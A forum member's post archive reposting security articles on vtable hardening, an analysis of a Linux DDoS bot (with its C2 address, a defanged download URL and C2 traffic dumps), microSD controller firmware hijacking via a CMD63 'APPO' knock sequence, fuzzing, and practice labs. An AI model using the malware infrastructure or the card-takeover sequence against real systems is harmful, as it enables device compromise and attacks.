-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
vtable protections: fast and thorough? Recently, there's been a reasonable amount of activity in the vtable protection space. Most of it is compiler-based. For example, there's the GCC-based virtual table verification, aka. VTV. There are also multiple experiments based on clang / LLVM and of course MSVC's vtguard. In the non-compiler space, there's Blink's heap partitioning, enabled by PartitionAlloc. It seems, though, that these various techniques require the user to choose between "fast" or "thorough protection". This isn't ideal. Shortly, I'll document my own idea for how to try and get both fast and thorough. But first, a recap on what we mean by fast and thorough. Fast vtable protection Protecting vtables typically involves inserting machine instructions around vtable pointer load or virtual calls. Going fast is simple: only insert a very small number of fast instructions (i.e. no hard-to-predict branches). This is the approach taken by vtguard. If you look at page 14 in the vtguard PDF linked above, you'll see that there's just a single cmp and a single jne (short, and never taken in normal execution) added to the hot path. Tangentially, another task commonly undertaken when adding vtable protections to a given program is to remove as many virtual calls as possible, by annotating classes and methods with the "final" keyword and/or applying whole-program optimizations. Thorough vtable protection Describing what we want in a thorough vtable protection is a little more involved. We want: Defeating ASLR does not defeat the vtable check. (vtguard lacks this property, whereas the GCC implementation has it.) Only a valid vtable pointer can be used. Furthermore, only a vtable pointer corresponding to the correct hierarchy for the call site can be used. Ideally, only a vtable pointer corresponding to the correct hierarchy level for the call site can be used. A fast solution for thorough vtable protection? How can we get all of the protections above and get them fast? My idea revolves around separating the problem into two pieces: Work out whether we can trust the vtable pointer or not. Validate that the class type represented by the vtable pointer is appropriate for the call site. To trust or not to trust? Current schemes trust the vtable pointer or not, based either on an some secret (vtguard, xor-based LLVM approach), a fixed table of valid values (GCC, some LLVM approaches) or by constraining values that might appear in the vtable position (heap partitioning). The new scheme would be to reserve a certain portion of the address space for vtables. We know that nothing else can be mapped there, so by suitably masking any proposed vtable pointer, we know it is valid. I haven't fully thought this through for 32-bit, but look at this 64-bit variant: Host vtables in the lower 4GB of address space. Use the dereference of a 32-bit register to load the vtable entry. This provides masking for free and even saves a byte in the instruction sequence. It works because loading 4-bytes into a 64-bit register zero extends the result. Optionally, save memory by having the compiler use 4-byte vtables. This scheme is approximately free, maybe even performance positive in some situations. Furthermore, one possible implementation is to stop somewhere around here for a very fast protection scheme that is "ok" in thoroughness. On the downside, you've lost the 64-bit invariant that "nothing is mapped in the bottom 4GB", but the percentage of space used is going to be small. If that bothers us, then we can use the same trick to load a 4-byte vtable pointer and then "or" it with 0x100000000 (use bts if you dare) or some other value. Validating class type Once you know you trust your vtable pointer, validating the class type becomes a lot simpler. Instead of messing with secrets inside the vtable, you can just store a compact representation of the class type inside the vtable, with the aim of satisfying validation needs with a single compare. The one trick we want to play is to make it easy to validate various different positions in a class hierarchy with minimal work. To do this, we can store class details in a hierarchical format. To take a simple case, imagine that we have the following classes in the system: A1, A1:B1, A2, A2:B1, A2:B1:C1 We encode these using one byte per hierarchy level, the basemost class being the LSB: 00000001, 00000101, 00000002, 00000102, 00010102. (Note that this will be an approximation. For example, if you have more than 256 basemost classes with virtual functions, you would need to represent the first level with 2 or more bytes.) Finally, our "is this object of the correct type for the callsite?" check becomes a simple compare. Depending on the position in the hierarchy, we may be able to achieve the compare with no masking and therefore a single instruction. For example, for a call site expecting an object of type A1, it's just "cmpb $1, (%eax)". That's a 4-byte sequence, which is much shorter than the 10-byte sequence noted in the vtguard PDF. For a call site expecting an object of type A2:B1, it's "cmpw $0x102, (%eax)". Closing notes Will it work well? Who knows. I haven't had time to implement this, nor am I likely to in the near future. Feel free to take this and run with it. Note that this idea doesn't cover what to do with raw function pointer calls. If you want to head towards complete control flow integrity, you'll want to look at protecting those, as well as return addresses (the current canary-based stack defenses do nothing against an arbitrary read/write primitive). Posted by Chris at 5:11 PM Sursa: Security: vtable protections: fast and thorough?
-
Another look at a cross-platform DDoS botnet I learned from a recent " Malware Must Die" post about a Linux malware sample that is associated with DNS amplification attacks. As mentioned in the MMD post, several researchers have posted on this, or similar malware. Since I'm particularly interested in Linux malware, especially if it has a DDoS component, I thought I'd also take a look. I was able to get the malware to execute on my Linux sandbox and connect to the C&C. While I've yet to see any DDoS related activity, I did pcap the C2 comms and snap an image for Volatility analysis. Links to the pcap and memory image can be found at the bottom of this post. The malware was downloaded from hxxp://198.2. [.] 192.204:22/disknyp The MD5 hash value of the sample I obtained is 260533ebd353c3075c9dddf7784e86f9 The C2 is located at 190.115.20.27:59870 Referencing the supplied pcap, the compromised host connected to the C2 at 18:46 EST. Upon connection to the C2, the compromised host sends information about the current Linux kernel, in this case, "Linux 2.6.32-33-generic-pae" [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]bot sending kernel info to C2[/TD] [/TR] [/TABLE] It's interesting to note that the bot's C2 communications is via a persistent connection. Unlike typical HTTP bot check-in traffic, this bot maintains a connection to the remote host on port 59870. Since this is all one huge session, if you attempt "Follow TCP stream" in Wireshark, it will take a bit of time to present the output. The C2 then sends 4 bytes, "0x04 0x00 0x00 0x00" upon which the bot sends back 27 bytes of all 0x00. At 21:13, the C2 sends 75 bytes of hex: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Initial 75 byte sequence from C2 to bot[/TD] [/TR] [/TABLE] Approx. every thirty seconds, the C2 sends a new 75 byte sequence to the bot, for example: 01:00:00:00:43:00:00:00:00:fd:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9c:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9c:50:00 01:00:00:00:43:00:00:00:00:fe:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c7:d4:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c7:d4:50:00 01:00:00:00:43:00:00:00:00:ff:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9b:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9b:50:00 Byte offset decimal 09 appears to be a counter, incrementing by one each time on each sequence from the C2. The contents at decimal offset 28 and and 71 initially vary between 0xC6 and 0xC7. This continues until 22:06 EST when the pattern changes and varied values are seen: 01:00:00:00:43:00:00:00:00:1d:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:73:ee:ed:f5:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:73:ee:ed:f5:58:1b 01:00:00:00:43:00:00:00:00:1e:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:7a:e0:22:c7:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:7a:e0:22:c7:58:1b 01:00:00:00:43:00:00:00:00:1f:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:0e:11:5f:4a:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:0e:11:5f:4a:58:1b 01:00:00:00:43:00:00:00:00:20:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:3d:84:e6:15:5b:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:3d:84:e6:15:5b:1b The bot's replies again replies with a 27 byte sequence, however decimal offset 19 now has a value that will vary between 0 and 2. 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 Volatility Some basic Volatility analysis of the memory image yields the following: linux_pslist [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_pslist[/TD] [/TR] [/TABLE] The 'disknyp' process started at 23:45 UTC with PID 1241. Ran with user privs and no child processes were noted. linux_lsof -p1241 [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_lsof for PID 1241[/TD] [/TR] [/TABLE] Process 'disknyp', PID 1241 has /dev/null open as well as socket:[6931] linux_proc_maps [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_proc_maps for PID 1241[/TD] [/TR] [/TABLE] Note that /tmp/disknyp is the path where 'disknyp' was originally executed. Dumping the two segments at '/usr/tmp' produces two files, 'task.1241.0x8048000.vma' and 'task.1241.0x8168000.vma'. Running 'file' on the segments shows: task.1241.0x8048000.vma: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped Dumping strings for that segment shows: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]section of 'strings' output for PID 1241 segment 0x8048000[/TD] [/TR] [/TABLE] We note the string "fake.cfg" that was mentioned in other posts related to this malware. Attempting to find the file in the original /tmp directory: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_find_file for 'fake.cfg'[/TD] [/TR] [/TABLE] linux_yarascan Let's use the 'yarascan' plugin to see if there are any other references to 'fake.cfg' in this image. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]searching for other references to 'fake.cfg' using the linux_yarascan plugin[/TD] [/TR] [/TABLE] We see that the string 'fake.cfg' is only found in PID 1241, 'disknyp'. Again using the 'linux_find_file' plugin, we can dump the contents of 'fake.cfg' located at inode 0xed9dc088. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Contents of 'fake.cfg'[/TD] [/TR] [/TABLE] Final Thoughts This appears to be some Proof of Concept or "testing" malware. There are several aspects to this sample that make me wonder if it was just put out there to see how quickly it would be detected and analyzed. Analysis of the original file as downloaded from hxxp://198.2. [.] 192.204:22/disknyp that it is statically linked, not stripped. The C2 communications is somewhat noisy. Maintaining a persistent connection with checkins every few seconds is not very stealthy. No attempt to hide the process. In hours of running this, I didn't see any child processes or variance in the process on the local host. 'fake.cfg' is created in the malware's working directory. 'fake.cfg' really? As I mentioned earlier in the post, I have yet to see any DoS related traffic from this sample. I'm also not aware of DoS activity being seen by other researchers. If anyone has learned otherwise, I'd love to hear from you! Reference: Packet capture of initial malware download and execution - disknyp.pcap 4.1 MB - MD5 hash - 4fb44dfa3d98e17f13c6befd55787582 Memory image of Ubuntu Server infected with 'disknyp' - linux_disknyp.zip 167 MB - MD5 hash of unzipped .vmem - 04831ad2fbd089c2c5b7b8dc657d0e7a (Linux Volatility profile: LinuxUbuntu1004_pae32-33x86) Posted by Andre M. DiMino at 4:36 PM Sursa: Andre' M. DiMino -SemperSecurus: Another look at a cross-platform DDoS botnet
-
[h=1]PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS[/h]Following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of other collection entities were not given as it is not necessary to download each of them and manually configure them if they are already available in a configured state. For technologies used in each web application, please refer to the mindmap above. http://www.amanhardikar.com/mindmaps/PracticeUrls.html
-
On Hacking MicroSD Cards Today at the Chaos Computer Congress (30C3), xobs and I disclosed a finding that some SD cards contain vulnerabilities that allow arbitrary code execution — on the memory card itself. On the dark side, code execution on the memory card enables a class of MITM (man-in-the-middle) attacks, where the card seems to be behaving one way, but in fact it does something else. On the light side, it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers. In order to explain the hack, it’s necessary to understand the structure of an SD card. The information here applies to the whole family of “managed flash” devices, including microSD, SD, MMC as well as the eMMC and iNAND devices typically soldered onto the mainboards of smartphones and used to store the OS and other private user data. We also note that similar classes of vulnerabilities exist in related devices, such as USB flash drives and SSDs. Flash memory is really cheap. So cheap, in fact, that it’s too good to be true. In reality, all flash memory is riddled with defects — without exception. The illusion of a contiguous, reliable storage media is crafted through sophisticated error correction and bad block management functions. This is the result of a constant arms race between the engineers and mother nature; with every fabrication process shrink, memory becomes cheaper but more unreliable. Likewise, with every generation, the engineers come up with more sophisticated and complicated algorithms to compensate for mother nature’s propensity for entropy and randomness at the atomic scale. These algorithms are too complicated and too device-specific to be run at the application or OS level, and so it turns out that every flash memory disk ships with a reasonably powerful microcontroller to run a custom set of disk abstraction algorithms. Even the diminutive microSD card contains not one, but at least two chips — a controller, and at least one flash chip (high density cards will stack multiple flash die). You can see some die shots of the inside of microSD cards at a microSD teardown I did a couple years ago. In our experience, the quality of the flash chip(s) integrated into memory cards varies widely. It can be anything from high-grade factory-new silicon to material with over 80% bad sectors. Those concerned about e-waste may (or may not) be pleased to know that it’s also common for vendors to use recycled flash chips salvaged from discarded parts. Larger vendors will tend to offer more consistent quality, but even the largest players staunchly reserve the right to mix and match flash chips with different controllers, yet sell the assembly as the same part number — a nightmare if you’re dealing with implementation-specific bugs. The embedded microcontroller is typically a heavily modified 8051 or ARM CPU. In modern implementations, the microcontroller will approach 100 MHz performance levels, and also have several hardware accelerators on-die. Amazingly, the cost of adding these controllers to the device is probably on the order of $0.15-$0.30, particularly for companies that can fab both the flash memory and the controllers within the same business unit. It’s probably cheaper to add these microcontrollers than to thoroughly test and characterize each flash memory chip, which explains why managed flash devices can be cheaper per bit than raw flash chips, despite the inclusion of a microcontroller. The downside of all this complexity is that there can be bugs in the hardware abstraction layer, especially since every flash implementation has unique algorithmic requirements, leading to an explosion in the number of hardware abstraction layers that a microcontroller has to potentially handle. The inevitable firmware bugs are now a reality of the flash memory business, and as a result it’s not feasible, particularly for third party controllers, to indelibly burn a static body of code into on-chip ROM. The crux is that a firmware loading and update mechanism is virtually mandatory, especially for third-party controllers. End users are rarely exposed to this process, since it all happens in the factory, but this doesn’t make the mechanism any less real. In my explorations of the electronics markets in China, I’ve seen shop keepers burning firmware on cards that “expand” the capacity of the card — in other words, they load a firmware that reports the capacity of a card is much larger than the actual available storage. The fact that this is possible at the point of sale means that most likely, the update mechanism is not secured. In our talk at 30C3, we report our findings exploring a particular microcontroller brand, namely, Appotech and its AX211 and AX215 offerings. We discover a simple “knock” sequence transmitted over manufacturer-reserved commands (namely, CMD63 followed by ‘A’,'P’,'P’,'O’) that drop the controller into a firmware loading mode. At this point, the card will accept the next 512 bytes and run it as code. From this beachhead, we were able to reverse engineer (via a combination of code analysis and fuzzing) most of the 8051?s function specific registers, enabling us to develop novel applications for the controller, without any access to the manufacturer’s proprietary documentation. Most of this work was done using our open source hardware platform, Novena, and a set of custom flex circuit adapter cards (which, tangentially, lead toward the development of flexible circuit stickers aka chibitronics). Significantly, the SD command processing is done via a set of interrupt-driven call backs processed by the microcontroller. These callbacks are an ideal location to implement an MITM attack. It’s as of yet unclear how many other manufacturers leave their firmware updating sequences unsecured. Appotech is a relatively minor player in the SD controller world; there’s a handful of companies that you’ve probably never heard of that produce SD controllers, including Alcor Micro, Skymedi, Phison, SMI, and of course Sandisk and Samsung. Each of them would have different mechanisms and methods for loading and updating their firmwares. However, it’s been previously noted that at least one Samsung eMMC implementation using an ARM instruction set had a bug which required a firmware updater to be pushed to Android devices, indicating yet another potentially promising venue for further discovery. From the security perspective, our findings indicate that even though memory cards look inert, they run a body of code that can be modified to perform a class of MITM attacks that could be difficult to detect; there is no standard protocol or method to inspect and attest to the contents of the code running on the memory card’s microcontroller. Those in high-risk, high-sensitivity situations should assume that a “secure-erase” of a card is insufficient to guarantee the complete erasure of sensitive data. Therefore, it’s recommended to dispose of memory cards through total physical destruction (e.g., grind it up with a mortar and pestle). From the DIY and hacker perspective, our findings indicate a potentially interesting source of cheap and powerful microcontrollers for use in simple projects. An Arduino, with its 8-bit 16 MHz microcontroller, will set you back around $20. A microSD card with several gigabytes of memory and a microcontroller with several times the performance could be purchased for a fraction of the price. While SD cards are admittedly I/O-limited, some clever hacking of the microcontroller in an SD card could make for a very economical and compact data logging solution for I2C or SPI-based sensors. Slides from our talk at 30C3 can be downloaded here, or you can watch the talk on Youtube below. Team Kosagi would like to extend a special thanks to .mudge for enabling this research through the Cyber Fast Track program. Tags: flash, hacking, microcontroller, microsd, mitm Sursa: On Hacking MicroSD Cards
-
15 minute guide to fuzzing Matt Hillman August 08, 2013 Have you heard about fuzzing but are not sure what it is or if you should do it? This guide should quickly get you up to speed on what it’s all about. What is fuzzing? Fuzzing is a way of discovering bugs in software by providing randomised inputs to programs to find test cases that cause a crash. Fuzzing your programs can give you a quick view on their overall robustness and help you find and fix critical bugs. Fuzzing is ultimately a black box technique, requiring no access to source code, but it can still be used against software for which you do have source code, because it will potentially find bugs more quickly and avoid the need to review lots of code. Once a crash is detected, if you have the source code, it should become much easier to fix. Pros and cons of fuzzing Fuzzing can be very useful, but it is no silver bullet. Here are some of the pros and cons of fuzzing: Pros Can provide results with little effort: once a fuzzer is up and running, it can be left for hours, days or months to look for bugs with no interaction Can reveal bugs that were missed in a manual audit Provides an overall picture of the robustness of the target software Cons Will not find all bugs: fuzzing may miss bugs that do not trigger a full program crash, and may be less likely to trigger bugs that are only triggered in highly specific circumstances The crashing test cases that are produced may be difficult to analyse, as the act of fuzzing does not give you much knowledge of how the software operates internally Programs with complex inputs can require much more work to produce a smart enough fuzzer to get sufficient code coverage Smart and dumb fuzzing Fuzzers provide random input to software. This may be in the form of a network protocol, a file of a certain format or direct user input. The fuzzed input can be completely random with no knowledge of what the expected input should look like, or it can be created to look like valid input with some alterations. A fuzzer that generates completely random input is known as a “dumb” fuzzer, as it has no built-in intelligence about the program it is fuzzing. A dumb fuzzer requires the smallest amount of work to produce (it could be as simplistic as piping /dev/random into a program). This small amount of work can produce results for very little cost – one of fuzzing’s big advantages. However, sometimes a program will only perform certain processing if particular aspects of the input are present. For example, a program may accept a “name” field in its input, and this field may have a “name length” associated with it. If these fields are not present in a form that is valid enough for the program to identify, it may never attempt to read the name. However, if these fields are present in a valid form, but the length value is set to the incorrect value, the program may read beyond the buffer containing the name and trigger a crash. Without input that is at least partly valid, this is very unlikely to happen. In these cases, “smart” fuzzers can be used. These are programmed with knowledge of the input format (i.e. a protocol definition or rules for a file format). The fuzzer can then construct mostly valid input and only fuzz parts of the input within that basic format. The greater the level of intelligence that you build into a fuzzer, the deeper you may be able to go into a protocol or file format’s processing, but the more work you create for yourself. A balance needs to be found between these two extremes. It can be good to begin with a much more dumb fuzzer and increase its intelligence as the code quality of the software you are testing increases. If you get lots of crashes with a simplistic fuzzer, there is no point spending a long time making it more intelligent until the code quality increases to a point where the code requires it. Types of fuzzer Broadly speaking, fuzzers can be split into two categories based on how they create input to programs – mutation-based and generation-based. This section details those categories as well as offering a brief description of a more advanced technique called Evolutionary Fuzzing. Mutation Mutation-based fuzzers are arguably one of the easier types of fuzzer to create. This technique suites dumb fuzzing but can be used with more intelligent fuzzers as well. With mutation, samples of valid input are mutated randomly to produce malformed input. A dumb mutation fuzzer can simply select a valid sample input and alter parts of it randomly. For many programs, this can provide a surprising amount of mileage, as inputs are still often significantly similar enough to a valid input, so that good code coverage can be achieved without the need for further intelligence. You can build in greater intelligence by allowing the fuzzer to do some level of parsing of the samples to ensure that it only modifies specific parts or that it does not break the overall structure of the input such that it is immediately rejected by the program. Some protocols or file formats will incorporate checksums that will fail if they are modified arbitrarily. A mutation-based fuzzer should usually fix these checksums so that the input is accepted for processing or the only code that will be tested is the checksum validation and nothing else. Two useful techniques that can be used by mutation-based fuzzers are described below. Replay A fuzzer can take saved sample inputs and simply replay them after mutating them. This works well for file format fuzzing where a number of sample files can be saved and fuzzed to provide to the target program. Simple or stateless network protocols can also be fuzzed effectively with replay, as the fuzzer will not need to make lots of legitimate requests to get deep into the protocol. For a more complex protocol, replay may be more difficult as the fuzzer may need to respond in a dynamic way to the program to allow processing to continue deep into the protocol, or the protocol may simply be inherently non-replayable. Man-in-the-Middle or Proxy You may have heard of Man-in-the-Middle (MITM) as a technique used by penetration testers and hackers, but it can also be used for mutation-based network protocol fuzzing. MITM describes the situation where you place yourself in the middle of a client and server (or two clients in the case of peer-to-peer networking), intercepting and possibly modifying messages passed between them. In this way, you are acting like a proxy between the two. The term MITM is generally used when it is not expected that you will be acting like a proxy, but for our purposes the terms are largely interchangeable. By setting your fuzzer up as a proxy, it can mutate requests or responses depending on whether you are fuzzing the server or the client. Again, the fuzzer could have no intelligence about the protocol and simply randomly alter some requests and not others, or it could intelligently target requests at the specific level of the protocol in which you are interested. Proxy-based fuzzing can allow you to take an existing deployment of a networked program and quickly insert a fuzzing layer into it, without needing to make your fuzzer act like a client or server itself. Generation Generation-based fuzzers actually generate input from scratch rather than mutating existing input. Generation-based fuzzers usually require some level of intelligence in order to construct input that makes at least some sense to the program, although generating completely random data would also technically be generation. Generation fuzzers often split a protocol or file format into chunks which they can build up in a valid order, and randomly fuzz some of those chunks independently. This can create inputs that preserve their overall structure, but contain inconsistent data within that structure. The granularity of these chunks and the intelligence with which they are constructed define the level of intelligence of the fuzzer. While mutation-based fuzzing can have a similar effect as generation fuzzing (as, over time, mutations will be randomly applied without completely breaking the input’s structure), generating inputs ensures that this will be so. Generation fuzzing can also get deeper into a protocol more easily, as it can construct valid sequences of inputs applying fuzzing to specific parts of that communication. It also allows the fuzzer to act as a true client/server, generating correct, dynamic responses where these cannot be blindly replayed. Evolutionary Evolutionary fuzzing is an advanced technique, which we will only briefly describe here. It allows the fuzzer to use feedback from each test case to learn over time the format of the input. For example, by measuring the code coverage of each test case, the fuzzer can heuristically work out which properties of the test case exercise a given area of code, and it can gradually evolve a set of test cases that cover the majority of the program code. Evolutionary fuzzing often relies on other techniques similar to genetic algorithms and may require some form of binary instrumentation to operate correctly. What are you really fuzzing? Even for relatively dumb fuzzers, it is important to keep in mind what part of the code your test cases are actually likely to hit. To give a simple example, if you are fuzzing an application protocol that uses TCP/IP and your fuzzer randomly mutates a raw packet capture, you are likely to be corrupting the TCP/IP packets themselves and your input is unlikely to get processed by the application at all. Or, if you were testing an OCR program that parsed images of text into real text, but you were mutating the whole of an image file, you could end up testing its image parsing code more often than the actual OCR code. If you wanted to target that OCR processing specifically, you might wish to keep the headers of the image file valid. Likewise, you may be generating input that is so random that it does not pass an initial sanity check in the program, or the code contains a checksum that you do not correct. You are then only testing that first branch in the program, never getting deeper into the program code. Anatomy of a fuzzer To operate effectively, a fuzzer needs to perform a number of important tasks: Generate test cases Record test cases or any information needed to reproduce them Interface with the target program to provide test cases as input Detect crashes Fuzzers often split many of these tasks out into separate modules, for example having one library that can mutate data or generate it based on a definition and another to provide test cases to the target program and so on. Below are some notes on each of these tasks. Test case generation Generating test cases will vary depending on whether mutation-based or generation-based fuzzing is being employed. With either, there will be something that needs randomly transforming, whether it is a field of a particular type or an arbitrary chunk of data. These transformations can be completely random, but it is worth remembering that edge and corner cases can often be the source of bugs in programs. As such, you may wish to favour such cases and include values such as: Very long or completely blank strings Maximum and minimum values for integers on the platform Values like -1, 0, 1 and 2 Depending on what you are fuzzing, there may be specific values or characters that are more likely to trigger bugs. For example: Null characters New line characters Semi-colons Format string values (%n, %s, etc.) Application specific keywords Reproducibility The simplest way to reproduce a test case is to record the exact input used when a crash is detected. However, there are other ways to ensure reproducibility that can be more convenient in certain circumstances. One way to do this is to store the initial seed used for the random component of test case generation, and ensure that all subsequent random behaviour follows a path that can be traced back to that seed. By re-running the fuzzer with the same seed, the behaviour should be reproducible. For example, you may only record the test case number and the initial seed and then quickly re-execute generation with that seed until you reach the given test case. This technique can be useful when the target program may accumulate dependencies based on past inputs. Previous inputs may have caused the program to initialise various items in its memory that are required to be present to trigger the bug. In these situations, simply recording the crashing test case would not be sufficient to reproduce the bug. Interfacing with the target Interfacing with the target program to provide the fuzzed input is often straightforward. For network protocols, it may simply involve sending the test case over the network, or responding to a client request; for file formats, it may simply mean executing the program with a command line argument pointing to the test case. However, sometimes the input is provided in a form that is not trivial to generate in an automated way or where scripting the program to execute each test case has a high overhead and proves to be very slow. Creative thinking in these cases can reveal ways to exercise the relevant piece of code with the right data. For example, this may be performed by instrumenting a program in memory artificially to execute a parsing function with the input provided as an argument entirely in memory. This can remove the need for the program to go through a lengthy loading procedure before each test case, and further speed increases could be obtained by having test cases generated and provided completely in memory rather than going via the hard drive. Crash detection Crash detection is critical for fuzzing. If you cannot accurately determine when a program has crashed, you will not be able to identify a test case as triggering a bug. There are a number of common ways to approach this: Attach a debugger This will provide you with the most accurate results and you can script the debugger to provide you with a crash trace as soon as a crash is detected. However, having a debugger attached can slow programs significantly and this can cause quite an overhead. The fewer test cases you can generate in a given period of time, the fewer chances you have of finding a crash. See if the process disappears Rather than attaching a debugger, you can simply see if the process ID of the target still exists on the system after executing the test case. If the process has disappeared, it probably crashed. You can re-run the test case in a debugger later if you want some more information about the crash, and you can even do this automatically for each crash, while still avoiding the slowdown of having the debugger attached for every case. Timeout If the program normally responds to your test cases, you can set a timeout after which you assume the program has either crashed or frozen. This can also detect bugs that cause the program to become unresponsive but not necessarily to terminate. Whichever method you use, the program should be restarted whenever it crashes or becomes unresponsive, in order to allow fuzzing to continue. Fuzzing quality There are a number of things you can do to measure or improve the quality of your fuzzing. While these are all good things to keep in mind, you may not need to bother with them all if you are already getting lots of unique crashes within a useful timeframe. Speed Possibly one of the most important factors in fuzzing is speed. How many test cases per second/minute can you run? Sensible values will of course depend on the target, but the more test cases you can execute, the more likely you will be to find a crash in a given time period. Fuzzing is random, so every test case is like a lottery ticket, and you want as many of them as you can get. There are lots of things you can do to increase the speed of your test cases, such as improving the efficiency of your generation or mutation routines, parallelising test cases, decreasing timeouts or running programs in “headless” modes where they do not display a GUI. And of course if you want to, you can simply buy faster kit! Categorising crashes Finding crashes is of course only the start of the process. Once you find a crashing test case, you will need to analyse it, work out what the bug is and either fix it or write an exploit for it depending on your motivation. If you have thousands of crashing test cases, this can be quite daunting. By categorising crashes you can prioritise them according to which ones are most interesting to you. This can also help you identify when one test case is triggering the same bug as another, so you only keep the cases relating to unique crashes. In order to do this, you will need some automated information about the crash so you can make a decision. Running the test case with the target attached to a debugger can provide a crash trace which you can parse to find values such as the exception type, register values, stack contents and so on. One tool by Microsoft which can help with this is called, !exploitable (pronounced “bang exploitable”), which works with the Windbg debugger to categorise crashes according to how exploitable it thinks the bug is. Test case reduction As fuzzing randomly alters input, it is common for a crashing test case to have multiple alterations which are not relevant to triggering the bug. Test case reduction is the act of narrowing down a test case to the minimum set of alterations from a valid input required to trigger the bug, so that you only need to focus on that part of the input in your analysis. This reduction can be performed manually, but it can also be performed automatically by the fuzzer. When a crashing test case is encountered, the fuzzer can re-execute the test case several times, gradually reducing the alterations made to the input until the smallest set of changes remains, whilst still triggering the bug. This can simplify your analysis and may also help to categorise crashing test cases as you will know precisely what parts of the input are affected. Code coverage Code coverage is a measure of how much of the program’s code has been executed by the fuzzer. The idea is that the more coverage you get, the more of the program you have actually tested. Measuring code coverage can be tricky and often requires binary instrumentation to track which portions of code are being executed. You can also measure code coverage in different ways, such as by line, by basic block, by branch or by code path. Code coverage is not a perfect measure with regards to fuzzing, as it is possible to execute code without revealing bugs in it, and there are often areas of code that almost never get executed, such as safety error checks that are unlikely to really be needed and are very unlikely to be interesting to us anyway. Nevertheless, some form of code coverage measurement can provide insight into what your fuzzer is triggering within the program, especially when your fuzzing is completely black box and you may not yet know much about the program’s inner workings. Some tools and technologies that may help with code coverage include Pai Mei, Valgrind, DynamoRIO and DTrace. Fuzzing frameworks There are a number of existing frameworks that allow you to create fuzzers without having to work from scratch. Some of these frameworks are complex and it may still take a while to create a working fuzzer for your target; by contrast, others take a very simple approach. A selection of these frameworks and fuzzers is listed here for your reference: Radamsa Radamsa is designed to be easy to use and flexible. It attempts to “just work” for a variety of input types and contains a number of different fuzzing algorithms for mutation. Sulley Sulley provides a comprehensive generation framework, allowing structured data to be represented for generation based fuzzing. It also contains components to help with recording test cases and detecting crashes. Peach The Peach framework can perform smart fuzzing for file formats and network protocols. It can perform both generation- and mutation-based fuzzing and it contains components to help with modelling and monitoring the target. SPIKE SPIKE is a network protocol fuzzer. It requires good knowledge of C to use and is designed to run on Linux. Grinder Grinder is a web browser fuzzer, which also has features to help in managing large numbers of crashes. NodeFuzz NodeFuzz is a nodejs-based harness for web browsers, which includes instrumentation modules to gain further information from the client side. Sursa: https://www.mwrinfosecurity.com/knowledge-centre/15-minute-guide-to-fuzzing/
-
- 1
-
-
[h=2]Web Shell: PHP Meterpreter[/h] Sursa: Web Shell: PHP Meterpreter
-
